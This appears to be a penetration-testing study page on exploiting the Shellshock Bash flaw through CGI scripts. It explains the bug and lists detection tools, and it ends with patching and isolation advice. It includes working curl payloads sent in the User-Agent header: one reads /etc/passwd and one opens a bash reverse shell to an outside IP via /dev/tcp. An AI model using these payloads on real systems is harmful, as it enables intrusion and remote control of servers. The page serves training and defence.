CGI Applications - Shellshock

The Shellshock vulnerability allows an attacker to exploit old versions of Bash that save environment variables incorrectly. Typically when saving a function as a variable, the shell function will stop where it is defined to end by the creator. Vulnerable versions of Bash will allow an attacker to execute operating system commands that are included after a function stored inside an environment variable. Let's look at a simple example where we define an environment variable and include a malicious command afterward.

$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

When the above variable is assigned, Bash will interpret the y='() { :;};' portion as a function definition for a variable y. The function does nothing but returns an exit code 0, but when it is imported, it will execute the command echo vulnerable-shellshock if the version of Bash is vulnerable. This (or any other command, such as a reverse shell one-liner) will be run in the context of the web server user. Most of the time, this will be a user such as www-data, and we will have access to the system but still need to escalate privileges. Occasionally we will get really lucky and gain access as the root user if the web server is running in an elevated context.

If the system is not vulnerable, only "not vulnerable" will be printed.

Attacking Common Gateway Interface (CGI) Applications - Shellshock

$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

not vulnerable

This behavior no longer occurs on a patched system, as Bash will not execute code after a function definition is imported. Furthermore, Bash will no longer interpret y=() {...} as a function definition. But rather, function definitions within environment variables must now be prefixed with BASH_FUNC_.

CGI ShellShock web vulnerabilities

https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

CGI - HackTricksbook.hacktricks.xyz

# Hunt for CGI scripts 
gobuster dir -u http://172.25.210.128/cgi-bin -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x cgi

# ShellShock Vulnerability Detection
nmap -n -p80 --script http-shershock --script-args uri=/cgi-bin/keygen,cmd=ls 172.25.30.5

# Python code to detect ShellShok: https://github.com/erinzm/shellshocker
shellshocker.py [OPTIONS] URL

# Metasploit module to detect ShellShock
multi/http/apache_mod_cgi_bash_env_exec

#Confirming the vulnerability by trying to read /etc/passwd
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.129.204.231/cgi-bin/access.cgi

# Reverse Shell via ShellShock Exploit
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi

Mitigations

This blog post contains useful tips for mitigating the Shellshock vulnerability. The quickest way to remediate the vulnerability is to update the version of Bash on the affected system. This can be trickier on end-of-life Ubuntu/Debian systems, so a sysadmin may have first to upgrade the package manager. With certain systems (i.e., IoT devices that use CGI), upgrading may not be possible. In these cases, it would be best first to ensure the system is not exposed to the internet and then evaluate if the host can be decommissioned. If it is a critical host and the organization chooses to accept the risk, a temporary workaround could be firewalling off the host on the internal network as best as possible. Keep in mind that this is just putting a bandaid on a large wound, and the best course of action would be upgrading or taking the host offline.

How to Protect Your Server Against the Shellshock Bash Vulnerability | DigitalOceanDigitalOcean

Source

Best Online Cybersecurity Courses & Certifications | HTB Academyacademy.hackthebox.com

PreviousCommon Gateway Interfaces NextTomcat CGI

Last updated 1 day ago